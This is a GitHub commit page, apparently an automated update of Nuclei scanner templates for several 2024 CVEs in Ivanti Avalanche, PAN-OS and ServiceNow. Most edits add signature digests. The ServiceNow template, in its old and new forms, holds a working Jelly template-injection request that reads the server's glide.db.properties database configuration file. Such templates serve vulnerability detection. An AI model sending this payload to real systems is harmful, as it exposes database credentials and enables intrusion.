Auto Update Nuclei [Thu Nov 21 06:29:26 UTC 2024] :robot:

0x727 · Nov 21, 2024 · 5873818 · 5873818
1 parent aadab7c
commit 5873818
Show file tree

Hide file tree

Showing 4 changed files with 5 additions and 2 deletions.
diff --git a/plugins/ivanti/avalanche/CVE-2024-38653.yaml b/plugins/ivanti/avalanche/CVE-2024-38653.yaml
@@ -53,3 +53,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: Java"
+# digest: 4b0a00483046022100800d8067eff0be6cacac65e9708715505668e54fb5210e53975bf993bd49ce96022100acfc3e82d216de2184111a3146635646ea3230aad0953a6e9817eb1a84350ba5:922c64590222798bb761d5b6d8e72950
diff --git a/plugins/paloaltonetworks/pan-os/CVE-2024-0012.yaml b/plugins/paloaltonetworks/pan-os/CVE-2024-0012.yaml
@@ -44,3 +44,4 @@ http:
           - 'contains(header, "PHPSESSID=")'
           - 'status_code == 200'
         condition: and
+# digest: 4b0a00483046022100ca0502603214b47d45e7402e4ef79840d87e1989598554b1a8096f25ebb12396022100a4cd2cae49d7d0e115f5e93732d377067206f41f33e795ec69a1cdf2d5021a2a:922c64590222798bb761d5b6d8e72950
diff --git a/plugins/paloaltonetworks/pan-os/CVE-2024-9474.yaml b/plugins/paloaltonetworks/pan-os/CVE-2024-9474.yaml
@@ -85,3 +85,4 @@ http:
           - 'contains(interactsh_protocol, "dns")'
           - 'contains(body, "panos")'
         condition: and
+# digest: 4a0a0047304502207beb4f104484c68480eee2fe7785baf0080cb2b90bcbcdf24ed31cb63b907028022100fa6115004e5666bc5c525387ce2829f094e25014d31d57ed42fe0f8ba97e657f:922c64590222798bb761d5b6d8e72950
diff --git a/plugins/servicenow/servicenow/CVE-2024-5217.yaml b/plugins/servicenow/servicenow/CVE-2024-5217.yaml
@@ -28,7 +28,7 @@ info:
 http:
   - raw:
       - |
-        GET /login.do?jvar_page_title=<style><j:jelly+xmlns:j="jelly:core"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new+SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
+        GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj%3Ajelly%2Bxmlns%3Aj%3D%22jelly%3Acore%22%2Bxmlns%3Ag%3D'glide'%3E%3Cg%3Aevaluate%3Ez%3Dnew%2BPackages.java.io.File(%22%22).getAbsolutePath()%3Bz%3Dz.substring(0%2Cz.lastIndexOf(%22%2F%22))%3Bu%3Dnew%2BSecurelyAccess(z.concat(%22%2Fco..nf%2Fglide.db.properties%22)).getBufferedReader()%3Bs%3D%22%22%3Bwhile((q%3Du.readLine())!%3D%3Dnull)s%3Ds.concat(q%2C%22%5Cn%22)%3Bgs.addErrorMessage(s)%3B%3C%2Fg%3Aevaluate%3E%3C%2Fj%3Ajelly%3E%3C%2Fstyle%3E HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and
@@ -46,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e9515b4d468ac0501a40f645a76cff084bacf0ee929360cd16286bf146247503022060a8edc9206f1547392f6b47b16ae55c45598df04944010c30eb5cc0107a83ae:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502203dfd45ba63e79ed2b0e56f1bbc74ce637fb3936ad57ca8e58644ee92324a7da1022100d6feff1bb87315d815d6a14ae40c1810dd6ce350754012fbecdeb2bebcdad720:922c64590222798bb761d5b6d8e72950